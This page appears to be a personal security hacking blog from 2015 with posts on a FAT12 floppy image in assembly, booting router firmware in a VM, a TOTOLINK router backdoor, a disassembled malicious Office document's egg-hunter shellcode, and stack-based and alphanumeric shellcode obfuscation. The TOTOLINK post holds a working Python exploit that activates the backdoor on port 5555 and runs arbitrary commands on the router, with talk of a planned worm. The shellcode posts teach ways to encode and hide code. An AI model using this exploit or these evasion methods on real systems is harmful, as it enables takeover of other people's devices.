Sunday, December 20, 2015

Better visualization of data formats using assembly POC's to better implement them in C

Are you tired of staring at hex dumps, white papers and manual pages? Want to feel like you truly know how a data type like a file format, or a disk partition LOOKS like. Well I can't help you with the manual pages and white papers, (https://staff.washington.edu/dittrich/misc/fatgen103.pdf, http://www.eit.lth.se/fileadmin/eit/courses/eitn50/Projekt1/FAT12Description.pdf) but here is a great example of implementing a fat12 floppy image in assembly.

;////////////////////////////////////////////////////////////////////////////////
;// THE SCOTCH-WARE LICENSE (Revision 0):
;// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
;// can do whatever you want with this stuff. If we meet some day, and you think
;// this stuff is worth it, you can buy me a shot of scotch in return
;////////////////////////////////////////////////////////////////////////////////
; This assembles to a floppy disk image
[bits 16]
[org 0x7C00]

;;;;;;;;;;;;;;;;;;;;;;;;
; BIOS Parameter Block
jmp short boot_code
nop
db "MadOSv01"          ; OEM identifier
dw 512                 ; Bytes per sector
db 1                   ; sectors per cluster
dw 1                   ; reserved sectors
db 1                   ; number of fats
dw 112                 ; directory entries
dw 1280                ; logical sectors
db 0xFB                ; media descriptor type
dw 1                   ; sectors per fat, fat12/fat16 only
dw 18                  ; sectors per track
dw 2                   ; number of heads / sides on media
dd 0                   ; number of hidden sectors
dd 0                   ; Large amount of sector on media. This field is set if there are more than 65535 sectors in the volume.

; Extended Boot Record
db 0                   ; drive number
db 0                   ; reserved / NT flags (maybe use for MadOS, More research needed)
db 0x29                ; signiture, 0x28 or 0x29 for fat12 /fat16
dd 0x1337              ; volume serial number
db "MadOS Disk "       ; volume label
db "FAT12   "          ; identifier string

; Boot code
boot_code:
    xor ax, ax
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, boot_code_end + (1024 * 4)

    lea si, [message]
    call print_string
    jmp $

print_string:
    lodsb
    or al, al
    jz done
    mov ah, 0x0E
    int 0x10
    jmp print_string
done:
   ret

message:
    db "MadOS disk not bootable...", 0xd, 0xa

;dw 0xAA55 ; bootable partition signiture, uncomment to make the floppy boot
boot_code_end:
times 450 - (boot_code_end - boot_code) db 0

;;;;;;;;;;;;;;;;;;;;;
; DATA AREA START

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; FAT entries
; an entry is 3 nibbles:
;   000         -> unused
;   0xFF0-0xFF6 -> reserved cluster
;   0xFF7       -> bad cluster
;   0xFF8-0xFFF -> last cluster in file
;   ***         -> next data cluster

fat1:
    db 0xFB, 0xFF, 0xF0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x07, 0xF0, 0xFF, 0x00, 0x00
    ;    0     1     2     3     4     5     6     7     8     9     10    11    12    13
    times 512 - ($ - fat1) db 0
fat2:
    times 512 - ($ - fat2) db 0
;;;;;;;;;;;;;;;;;;
; root directory
root:
    folder:
        db "folder     "
        db 0x20 | 0x10         ; attributes: a, d
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 3                   ; low order bits of first cluster address
        dd 64                  ; file size

    file:
        db "file       "
        db 0x20                ; attributes: a
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 2                   ; low order bits of first cluster address
        dd 40                  ; file size

; padd out the rest of the root directory
times (512 * 4) - ($ - root) db 0


times 1024 db 0     ; first two data blocks are reserved

; 2 file
file_data:
    db "This is a file in the root directory :D", 0xa
; cluster padding
times 512 - ($ - file_data) db 0

; 3 folder
folder_data:
    file2:
        db "file2      "
        db 0x20                ; attributes: a
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 4                   ; low order bits of first cluster address
        dd 34                  ; file size
    folder2:
        db "folder2    "
        db 0x20 | 0x10         ; attributes: a, d
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 5                   ; low order bits of first cluster address
        dd 32                  ; file size
; cluster padding
times 512 - ($ - file2) db 0

; 4 file2
file2_data:
    db "This is a file in a sub directory", 0xa
; cluster padding
times 512 - ($ - file2_data) db 0


; 5 folder2_data
folder2_data:
    file3:
        db "file3      "
        db 0x20                ; attributes: a
        dw 0                   ; reserved
        dw 0xA496              ; creation time (h,m,s)
        dw 0x4793              ; creation date
        dw 0x4793              ; access date
        dw 0                   ; high order bits of first cluster address, 0 on fat12
        dw 0xA496              ; write time (h,m,s)
        dw 0x4793              ; write date
        dw 6                   ; low order bits of first cluster address
        dd 1024                ; file size
; cluster padding
times 512 - ($ - folder2_data) db 0

; 6 file3_data
file3_data:
times 512 - ($ - file3_data) db 'A'

; 7 file3_data2
file3_data2:
times 512 - ($ - file3_data2) db 'B'




;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; padd out the rest of the floppy
times ((1024 * 1024) + 461373) - ($ - $$) db 0

So from this exploration, we can construct the following header file as a start:

////////////////////////////////////////////////////////////////////////////////
// THE SCOTCH-WARE LICENSE (Revision 0):
//  wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a shot of scotch in return
////////////////////////////////////////////////////////////////////////////////

#ifndef __FAT_H__
#define __FAT_H__

#include <stdint.h>
#include <machine.h>

typedef struct bpb {
    char jmp_code[3];
    char oem[8];
    uint16_t bytes_per_sector;
    uint8_t sectors_per_cluster;
    uint16_t reserved_sectors;
    uint8_t fats;
    uint16_t dir_entries;
    uint16_t logical_sectors;
    uint8_t media_type;
    uint16_t sectors_per_fat;
    uint16_t sectors_per_track;
    uint16_t heads;
    uint32_t hidden_sectors;
    uint32_t large_sectors;
} bpb_t;

typedef struct ebr {
    uint8_t drive;
    uint8_t rflags;
    uint8_t signiture;
    uint32_t serial;
    char label[11];
    char identifier[8];
    char boot_code[448];
    uint16_t boot_sign;
} ebr_t;

typedef struct fat12_partition_info {
// see fat12.s for an implementation
// in assembly for visualization :D

    bpb_t bpb;
    ebr_t ebr;
    char data[];
} fat12_partition_info_t;

typedef struct fat_dir_entry {
    char name[11];
    uint8_t attributes;
    uint16_t reserved;
    uint16_t creation_time;
    uint16_t creation_date;
    uint16_t access_date;
    uint16_t caddr_high;
    uint16_t write_time;
    uint16_t write_date;
    uint16_t caddr_low;
    uint32_t size;
} fat_dir_entry_t;

const uint8_t fat12_format_stub[122] = {
  0xEB, 0x3C, 0x90, 0x4D, 0x61, 0x64, 0x4F, 0x53, 0x76, 0x30,
  0x31, 0x00, 0x02, 0x01, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x37,
  0x13, 0x00, 0x00, 0x4D, 0x61, 0x64, 0x4F, 0x53, 0x20, 0x44,
  0x69, 0x73, 0x6B, 0x20, 0x46, 0x41, 0x54, 0x31, 0x32, 0x20,
  0x20, 0x20, 0x31, 0xC0, 0x8E, 0xD8, 0x8E, 0xC0, 0x8E, 0xD0,
  0xBC, 0x7A, 0x8C, 0x8D, 0x36, 0x5E, 0x7C, 0xE8, 0x02, 0x00,
  0xEB, 0xFE, 0xAC, 0x08, 0xC0, 0x74, 0x06, 0xB4, 0x0E, 0xCD,
  0x10, 0xEB, 0xF5, 0xC3, 0x4D, 0x61, 0x64, 0x4F, 0x53, 0x20,
  0x64, 0x69, 0x73, 0x6B, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x62,
  0x6F, 0x6F, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x2E, 0x2E, 0x2E,
  0x0D, 0x0A
};


/////////////////////////////////////////////
// FAT12 entries                           //
/////////////////////////////////////////////
// an entry is 3 nibbles:                  //
//   000         -> unused                 //
//   0xFF0-0xFF6 -> reserved cluster       //
//   0xFF7       -> bad cluster            //
//   0xFF8-0xFFF -> last cluster in file   //
//   ***         -> next data cluster      //
/////////////////////////////////////////////

typedef char fat12_t[];
#define GET_FAT12_ENTRY(n, fat)\
    (n % 2 == 0 ? fat[((3 * n) / 2)] | (fat[1 + (3 * n) / 2] & 0x0F) << 8 : \
    (fat[(3 * n) / 2] & 0xF0) >> 4 | fat[1 + (3 * n) / 2] << 4)


#endif


Wednesday, December 16, 2015

Flat Memory Manager example


Saturday, November 28, 2015

Exploring cellular automata with conway's game of life as a foundation


Friday, August 14, 2015

simulating router firmware for live demonstration, more advanced RE, or just giggles

So I needed to put together a live demonstration for a presentation I'm doing soon on the attack surface of embedded devices, and why the industry seems to want their devices vulnerable. I have never needed to boot a firmware image in such a controlled manner before, and decided this would be something nice to share with others so they can just get this kind of thing up and running without hassle for their warped projects. So without further ado, lets get started.

Before you set this up, you will need to set up a basic virtual machine with the GNU/Linux distribution of your choice. You will also need to have already extracted the firmware image into a folder called squashfs-root unless you want to do the smart thing, and apply these instructions to your own personal setup.

First open the /etc/inittab for your firmware image. locate the line for sysinit and take note of what it has there.

::sysinit:/etc/rcS
::respawn:/sbin/getty 115200 ttyS1
::respawn:/bin/sh 
::restart:/sbin/init
::shutdown:/bin/umount -a -r

Ok, copy the squashfs-root folder to the root directory of the virtual machines disk image, then copy the following script into the root directory of the image as well after modifying it to meet the needs of your particular firmware image:

#!/bin/bash

export FIRMROOT="/squashfs-root"
export SYSINIT="/etc/rcS"

ifconfig eth0 10.0.3.10

# bind mount the important things so that this acts like a real linux system
mount --bind /tmp $FIRMROOT/tmp
mount --bind /sys $FIRMROOT/sys
mount --bind /proc $FIRMROOT/proc
mount --bind /dev $FIRMROOT/dev

# chroot into the firmware image, and launch the correct sysinit script for your firmware.
chroot $FIRMROOT /bin/sh -c $SYSINIT

And thats how its done. Here is a screenshot of the web login for this router running in VM:

And here is a screenshot of the router VM being exploited:

Thursday, August 13, 2015

TOTOLINK backdoor exploitation POC

The following is a simple router exploit POC for giggles, based on the following vulnerability. It would appear this doesn't even have a CVE, nor has the manufacturer been notified. I will be notifying the manufacturer and will also be writing another worm POC based on this exploit lol.
#!/usr/bin/env python
# ------------------------------------------------------------------------------
# THE SCOTCH-WARE LICENSE (Revision 43):
# <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a shot of scotch in return
# ------------------------------------------------------------------------------
import socket, sys, urllib

if len(sys.argv) < 2:
    print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0])
    exit(1)

commandstr = urllib.quote_plus(" ".join(sys.argv[2:]))

def check_activate_backdoor():
    try:
        vulnerable = "hel,xasf"     # this is both the check, and the command to open the management interface to the internet
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send(vulnerable)
        ret = True if s.recv(len(vulnerable)) == vulnerable else False
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return ret

def close_backdoor():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send("oki,xasf")
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    return

if check_activate_backdoor():
    print("\x1b[032mThis device appears to be vulnerable\nbackdoor activated\x1b[0m")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 80))
        s.send("POST /boafrm/formSysCmd HTTP/1.1\r\n\r\nsysCmd=%s&apply=Apply&msg=\r\n\r\n" % commandstr)
        
        print("\x1b[032mCommands sent\x1b[0m")
        print("\x1b[032mResponse: \n%s\x1b[0m" % s.recv(512))
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0])
        exit(2)
    close_backdoor()
    exit(0)
else:
    print("\x1b[032mThis device isn't vulnerable lol\x1b[0m")
    exit(1)


Wednesday, August 12, 2015

I have a new challenge for you ;) good luck

Below is a challenge, figure it out lol. Email answers to: aaronryool@gmail.com for shout outs



f0VMRki7Z4lotpbWTn/DAAIAPgABAAAAQIAECAAAAADyAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAAB
AAAAAAAAAFhIg/gCfDFYWGhQgAQI67RIuUiLCEgx2cMAUUi5LRSQkJCQkJBRSLlIuiDmB9Lao1H/
1Egx0XQ4aIQAAAC6YOb/3Lhldm9MSMHgIEg1ZXRhSDQPW0g1AAA5R0jB4iCA6zxIMdAw3EiJBQAA
AABIMcBqAWoBWF9IjTQlxYAECGotWg8F67NZQVkhISEgVGhhdCB0aGluZyB5b3UgZGlkLCB0ZWxs
IG1lIGFib3V0IGl0LgoBAAAABwAAAAAAAAAAAAAAAIAECAAAAAAAgAQIAAAAACoBAAAAAAAAKgEA
AAAAAAAAEAAAAAAAAA==

Tuesday, August 11, 2015

Hax 4 Snacks Part 1

So a new friend of mine told me he wanted help extracting the shellcode and payloads from a doc file, I had never analyzed a doc file before so I just HAD to say yes after informing him that I hadn't done analysis of this particular attack vector before. In the end he said he would buy me a pizza if i could pull this off. It turns out, this evil thing is a copy cat of an existing piece of malware, find information here and its the evil version of that lol. so this made my analysis easier, especially since i have never analyzed office documents before in my LIFE. So far I can confirm that this uses at least some of the same exploits, and I feel safe to conject that it is just an obfuscated re-packaging of the original malware concept. This version also appears to be somewhat smaller in size as well. In part two I hope to do further analysis to find the signature of the egg, and decrypt the second stage shellcode. I will also plan on doing a more in depth closing analysis to find more information on the c&c, and maybe who the authors are for fun.

Stage 1 payload (crypter, egg hunter):

00000000  43                inc ebx
00000001  49                dec ecx
00000002  42                inc edx
00000003  46                inc esi
00000004  47                inc edi
00000005  42                inc edx
00000006  43                inc ebx
00000007  48                dec eax
00000008  4F                dec edi
00000009  48                dec eax
0000000A  4B                dec ebx
0000000B  4E                dec esi
0000000C  41                inc ecx
0000000D  43                inc ebx
0000000E  4E                dec esi
0000000F  4F                dec edi
00000010  4A                dec edx
00000011  48                dec eax
00000012  4A                dec edx
00000013  4A                dec edx
00000014  4A                dec edx
00000015  47                inc edi
00000016  4B                dec ebx
00000017  47                inc edi
00000018  47                inc edi
00000019  42                inc edx
0000001A  42                inc edx
0000001B  42                inc edx
0000001C  43                inc ebx
0000001D  43                inc ebx
0000001E  47                inc edi
0000001F  4A                dec edx
00000020  43                inc ebx
00000021  47                inc edi
00000022  4A                dec edx
00000023  48                dec eax
00000024  48                dec eax
00000025  4F                dec edi
00000026  49                dec ecx
00000027  43                inc ebx
00000028  42                inc edx
00000029  42                inc edx
0000002A  47                inc edi
0000002B  4E                dec esi
0000002C  48                dec eax
0000002D  42                inc edx
0000002E  D9EE              fldz
00000030  6681EF4BA9        sub di,0xa94b
00000035  6681CF72CB        or di,0xcb72
0000003A  81EED99C5940      sub esi,0x40599cd9
00000040  9BD97424F4        fstenv [esp-0xc]
00000045  6681EEA84B        sub si,0x4ba8
0000004A  83E766            and edi,byte +0x66
0000004D  66BFD341          mov di,0x41d3
00000051  8B0C24            mov ecx,[esp]
00000054  6681F729BE        xor di,0xbe29
00000059  6681F669C2        xor si,0xc269
0000005E  83ECFF            sub esp,byte -0x1
00000061  4E                dec esi
00000062  83C402            add esp,byte +0x2
00000065  6601FE            add si,di
00000068  44                inc esp
00000069  81C611B15949      add esi,0x4959b111
0000006F  6681EEA84B        sub si,0x4ba8
00000074  81C1C2000000      add ecx,0xc2
0000007A  6681EE5A44        sub si,0x445a
0000007F  31C0              xor eax,eax
00000081  8D742420          lea esi,[esp+0x20]
00000085  058AFEFFFF        add eax,0xfffffe8a
0000008A  BFAEAF3A6C        mov edi,0x6c3aafae
0000008F  F7D8              neg eax
00000091  29FE              sub esi,edi
00000093  29D2              sub edx,edx
00000095  6689FF            mov di,di
00000098  30FF              xor bh,bh
0000009A  80CF5E            or bh,0x5e
0000009D  6601F7            add di,si
000000A0  81EED99C5940      sub esi,0x40599cd9
000000A6  8A19              mov bl,[ecx]
000000A8  C1E6A2            shl esi,byte 0xa2
000000AB  C1EFEA            shr edi,byte 0xea
000000AE  30FB              xor bl,bh
000000B0  47                inc edi
000000B1  F6C301            test bl,0x1
000000B4  7515              jnz 0xcb
000000B6  81EF129A95A3      sub edi,0xa3959a12
000000BC  80EBFF            sub bl,0xff
000000BF  66BF7E92          mov di,0x927e
000000C3  EB12              jmp short 0xd7
000000C5  81EE9FC8896D      sub esi,0x6d89c89f
000000CB  81EF60C7B01D      sub edi,0x1db0c760
000000D1  FECB              dec bl
000000D3  66C1E773          shl di,byte 0x73
000000D7  66C1EE26          shr si,byte 0x26
000000DB  8819              mov [ecx],bl
000000DD  6689F7            mov di,si
000000E0  83EAFF            sub edx,byte -0x1
000000E3  47                inc edi
000000E4  83C101            add ecx,byte +0x1
000000E7  BE82AC2B86        mov esi,0x862bac82
000000EC  39C2              cmp edx,eax
000000EE  75B0              jnz 0xa0
000000F0  6E                outsb
000000F1  96                xchg eax,esi
000000F2  3BD4              cmp edx,esp
000000F4  2E6F              cs outsd
000000F6  D429              aam 0x29
000000F8  53                push ebx
000000F9  D429              aam 0x29
000000FB  43                inc ebx
000000FC  D431              aam 0x31
000000FE  57                push edi
000000FF  D419              aam 0x19
00000101  7FD4              jg 0xd7
00000103  69396617472A      imul edi,[ecx],dword 0x2a471766
00000109  AD                lodsd
0000010A  D41A              aam 0x1a
0000010C  63D4              arpl sp,dx
0000010E  0B5A27            or ebx,[edx+0x27]
00000111  5E                pop esi
00000112  B5D4              mov ch,0xd4
00000114  2D7F5EB16E        sub eax,0x6eb15e7f
00000119  96                xchg eax,esi
0000011A  1E                push ds
0000011B  F25E              repne pop esi
0000011D  B7D4              mov bh,0xd4
0000011F  47                inc edi
00000120  7407              jz 0x129
00000122  5B                pop ebx
00000123  DEA4BA7F82A02A    fisub word [edx+edi*4+0x2aa0827f]
0000012A  B016              mov al,0x16
0000012C  D405              aam 0x5
0000012E  7B5E              jpo 0x18e   ; jmp to the middle of an instruction further down,MAYBE, it depends on whether it is ever taken
00000130  B439              mov ah,0x39
00000132  D453              aam 0x53
00000134  14D4              adc al,0xd4
00000136  05435EB45C        add eax,0x5cb45e43
0000013B  73D4              jnc 0x111
0000013D  0A0A              or cl,[edx]
0000013F  6E                outsb
00000140  8439              test [ecx],bh
00000142  DE94A0501C3557    ficom word [eax+0x57351c50]
00000149  0CD4              or al,0xd4
0000014B  1B7B57            sbb edi,[ebx+0x57]
0000014E  A08FDA9F2A        mov al,[0x2a9fda8f]
00000153  B2E7              mov dl,0xe7
00000155  1A1A              sbb bl,[edx]
00000157  3030              xor [eax],dh
00000159  D6                salc
0000015A  80F02A            xor al,0x2a
0000015D  B7F0              mov bh,0xf0
0000015F  2ABADE60FDFD      sub bh,[edx-0x2029f22]
00000165  8A8A2A870908      mov cl,[edx+0x809872a]
0000016B  0CD6              or al,0xd6
0000016D  A1DCB157E6        mov eax,[0xe657b1dc]
00000172  103E              adc [esi],bh
00000174  5B                pop ebx
00000175  5F                pop edi
00000176  E79A              out 0x9a,eax
00000178  C243DE            ret 0xde43


; PART 2, jmp to middle of instruction
00000000  872A              xchg ebp,[edx]
00000002  EF                out dx,eax
00000003  DC985B06086E      fcomp qword [eax+0x6e08065b]
00000009  96                xchg eax,esi
0000000A  E9A5E11C3E        jmp dword 0x3e1ce1b4

Start of Object Linking and Embedding Compound File:


TIFF heap spray:

CVE-2013-3906

Saturday, August 8, 2015

stack based binary obfuscation from hell

So i had a funny idea, and decided to do this

: code is pushed onto the stack in reverse order, and the pieces have to be put on in little endian so everything comes out right
: i padded everything with nops as well
[bits 64]

section .text
global _start

org 0x08048000
ehdr:                                  ; Elf64_Ehdr
 db 0x7F, "ELF", 2, 1, 1, 0         ;   e_ident
 times 8 db      0
 dw 2                               ;   e_type
 dw 62                              ;   e_machine
 dd 1                               ;   e_version
 dq _start                          ;   e_entry
 dq phdr - $$                       ;   e_phoff
 dq 0                               ;   e_shoff
 dd 0                               ;   e_flags
 dw ehdrsize                        ;   e_ehsize
 dw phdrsize                        ;   e_phentsize
 dw 1                               ;   e_phnum
 dw 0                               ;   e_shentsize
 dw 0                               ;   e_shnum
 dw 0                               ;   e_shstrndx
 ehdrsize equ $ - ehdr
phdr:                                  ; Elf64_Phdr
 dd 1                               ;   p_type
 dd 7                               ;   p_flags
 dq 0                               ;   p_offset
 dq $$                              ;   p_vaddr
 dq $$                              ;   p_paddr
 dq filesize                        ;   p_filesz
 dq filesize                        ;   p_memsz
 dq 0x1000                          ;   p_align
 phdrsize equ $ - phdr
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

_start:
; exit syscall
    mov rax, 0x909090050f583c6a
    push rax            ; push the code above to stack

;    xor rdx, rdx
;    mov dl, 15
;    syscall
    mov rax, 0x90050f0fb2d23148
    push rax

;    xor rax, rax
;    mov al, 1
;    mov rdi, rax
    mov rax, 0xc7894801b0c03148
    push rax

;    push rsi
;    push rsp
;    pop rsi
;    xor rdx, rdx
;    mov dl, 8
    mov rax, 0x08b2d231485e5456
    push rax

;    sub rsp, 32
;    mov rsi, 0x0a2121216f6c6548
    mov rax, 0x0a2121216f6c6548
    push rax
    mov rax, 0xbe4820ec83489090
    push rax

    push rsp            ; return pointer
    ret ; run code

filesize equ $ - $$






[madmouse@yourmomsb0x alphanum64]$ ./stackobfrop
Helo!!!
[madmouse@yourmomsb0x alphanum64]$ 

printable shellcode example for knowledge spreading and stuff ;)

A simple example to show you how you can run encoded non printable things like syscall on the stack with magic and stuff. this turns into: "hNDqqTXP, PYhAAAAX1A jNX4r"
[bits 64]

_start:
    push 0x7171444e     ; store our code in little endian
    push rsp            ; return pointer
    pop rax
    push rax
    sub al, 32          ; needed to make xor printable code, this will fail on rare occassion when the value is less than 32
    push rax            ; copy rax into rcx
    pop rcx
    push 0x41414141     ; syscall code block key
    pop rax
    xor [rcx+32], eax   ; decode the sycall code block using an offset for more ass pulling
    push 0x4e           ; encoded syscall number for exit
    pop rax
    xor al, 0x72        ; xor it with the key
ret ; this is removed when turned into shellcode

; printable: 0x20 - 0x7e
; alphanum:  0x30 - 0x39, 0x41 - 0x5A, 0x61 - 0x7A

;     CODE               | ASCII  | HEX
;________________________|________|_________________________
;    and rax, 0x7a7a7a7a ; H%zzzz | 0x48,0x25,0x7a,0x7a,0x7a,0x7a
;    and eax, 0x7a7a7a7a ; %zzzz  | 0x25,0x7a,0x7a,0x7a,0x7a
;    and ax, 0x7a7a      ; f%zz   | 0x66,0x25,0x7a,0x7a
;    and al, 0x7a        ; $z     | 0x24,0x7a
;    sub rax, 0x7a7a7a7a ; H-zzzz | 0x48,0x2d,0x7a,0x7a,0x7a,0x7a
;    sub eax, 0x7a7a7a7a ; -zzzz  | 0x2d,0x7a,0x7a,0x7a,0x7a
;    sub ax, 0x7a7a      ; f-zz   | 0x66,0x2d,0x7a,0x7a
;    sub al, 0x7a        ; ,z     | 0x2c,0x7a
;    xor rax, 0x7a7a7a7a ; H5zzzz | 0x48,0x35,0x7a,0x7a,0x7a,0x7a
;    xor eax, 0x7a7a7a7a ; 5zzzz  | 0x35,0x7a,0x7a,0x7a,0x7a
;    xor ax, 0x7a7a      ; f5zz   | 0x66,0x35,0x7a,0x7a
;    xor al, 0x7a        ; 4z     | 0x34,0x7a
;    cmp rax, 0x7a7a7a7a ; H=zzzz | 0x48,0x3d,0x7a,0x7a,0x7a,0x7a
;    cmp eax, 0x7a7a7a7a ; =zzzz  | 0x3d,0x7a,0x7a,0x7a,0x7a
;    cmp ax, 0x7a7a      ; f=zz   | 0x66,0x3d,0x7a,0x7a
;    cmp al, 0x7a        ; <z     | 0x3c,0x7a
;    push rax            ; P      | 0x50
;    push rbx            ; S      | 0x53
;    push rcx            ; Q      | 0x51
;    push rdx            ; R      | 0x52
;    push rdi            ; W      | 0x57
;    push rsi            ; V      | 0x56
;    push rsp            ; T      | 0x54
;    push rbp            ; U      | 0x55
;    push r8             ; AP     | 0x41,0x50
;    push r9             ; AQ     | 0x41,0x51
;    push r10            ; AR     | 0x41,0x52
;    push r11            ; AS     | 0x41,0x53
;    push r12            ; AT     | 0x41,0x54
;    push r13            ; AU     | 0x41,0x55
;    push r14            ; AV     | 0x41,0x56
;    push r15            ; AW     | 0x41,0x57
;    push ax             ; fP     | 0x66,0x50
;    push bx             ; fS     | 0x66,0x53
;    push cx             ; fQ     | 0x66,0x51
;    push dx             ; fR     | 0x66,0x52
;    push di             ; fW     | 0x66,0x57
;    push si             ; fV     | 0x66,0x56
;    push sp             ; fT     | 0x66,0x54
;    push r8             ; fAP    | 0x66,0x41,0x50
;    push r9w            ; fAQ    | 0x66,0x41,0x51
;    push r10w           ; fAR    | 0x66,0x41,0x52
;    push r11w           ; fAS    | 0x66,0x41,0x53
;    push r12w           ; fAT    | 0x66,0x41,0x54
;    push r13w           ; fAU    | 0x66,0x41,0x55
;    push r14w           ; fAV    | 0x66,0x41,0x56
;    push r15w           ; fAW    | 0x66,0x41,0x57
;    push 0x7a7a7a7a     ; hzzzz  | 0x68,0x7a,0x7a,0x7a,0x7a
;    push word 0x7a7a    ; fhzz   | 0x66,0x68,0x7a,0x7a
;    push 0x7a           ; jz     | 0x6a,7a
;    pop rax             ; X      | 0x58
;    pop rbx             ; [      | 0x5b
;    pop rcx             ; Y      | 0x59
;    pop rdx             ; Z      | 0x5a
;    pop rdi             ; _      | 0x5f
;    pop rsi             ; ^      | 0x5e
;    pop rsp             ; \      | 0x5c
;    pop rbp             ; ]      | 0x5c
;    pop r8              ; AX     | 0x41,0x58
;    pop r9              ; AY     | 0x41,0x59
;    pop r10             ; AZ     | 0x41,0x5a
;    pop r11             ; A[     | 0x41,0x5b
;    pop r12             ; A\     | 0x41,0x5c
;    pop r13             ; A]     | 0x41,0x5d
;    pop r14             ; A^     | 0x41,0x5e
;    pop r15             ; A_     | 0x41,0x5f
;    pop ax              ; fX     | 0x66,0x58
;    pop bx              ; f[     | 0x66,0x5b
;    pop cx              ; fY     | 0x66,0x59
;    pop dx              ; fZ     | 0x66,0x5a
;    pop r8w             ; fAX    | 0x66,0x41,0x58
;    pop r9w             ; fAY    | 0x66,0x41,0x59
;    pop r10w            ; fAZ    | 0x66,0x41,0x5a
;    pop r11w            ; fA[    | 0x66,0x41,0x5b
;    pop r12w            ; fA\    | 0x66,0x41,0x5c
;    pop r13w            ; fA]    | 0x66,0x41,0x5d
;    pop r14w            ; fA^    | 0x66,0x41,0x5e
;    pop r15w            ; fA_    | 0x66,0x41,0x5f
;    jo short 0x7b       ; pz     | 0x70,0x7a
;    jno short 0x7b      ; qz     | 0x71,0x7a
;    jb short 0x7b       ; rz     | 0x72,0x7a
;    jnae short 0x7b     ; rz     | 0x72,0x7a
;    jc short 0x7b       ; rz     | 0x72,0x7a
;    jnb short 0x7b      ; sz     | 0x73,0x7a
;    jae short 0x7b      ; sz     | 0x73,0x7a
;    jnc short 0x7b      ; sz     | 0x73,0x7a
;    jz short 0x7b       ; tz     | 0x74,0x7a
;    je short 0x7b       ; tz     | 0x74,0x7a
;    jnz short 0x7b      ; uz     | 0x75,0x7a
;    jne short 0x7b      ; uz     | 0x75,0x7a
;    jbe short 0x7b      ; vz     | 0x76,0x7a
;    jna short 0x7b      ; vz     | 0x76,0x7a
;    jnbe short 0x7b     ; wz     | 0x77,0x7a
;    ja short 0x7b       ; wz     | 0x77,0x7a
;    js short 0x7b       ; xz     | 0x78,0x7a
;    jns short 0x7b      ; yz     | 0x79,0x7a
;    jp short 0x7b       ; zz     | 0x7a,0x7a
;    jpe short 0x7b      ; zz     | 0x7a,0x7a
;    jnp short 0x7b      ; {z     | 0x7b,0x7a
;    jpo short 0x7b      ; {z     | 0x7b,0x7a
;    jl short 0x7b       ; |z     | 0x7c,0x7a
;    jnge short 0x7b     ; |z     | 0x7c,0x7a
;    jnl short 0x7b      ; }z     | 0x7d,0x7a
;    jge short 0x7b      ; }z     | 0x7d,0x7a
;    jle short 0x7b      ; ~z     | 0x7e,0x7a
;    jng short 0x7b      ; ~z     | 0x7e,0x7a

example of failure:
[madmouse@yourmomsb0x alphanum64]$ ./shellcode                 
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
[madmouse@yourmomsb0x alphanum64]$ ./shellcode
zsh: segmentation fault  ./shellcode
[madmouse@yourmomsb0x alphanum64]$  

Friday, August 7, 2015

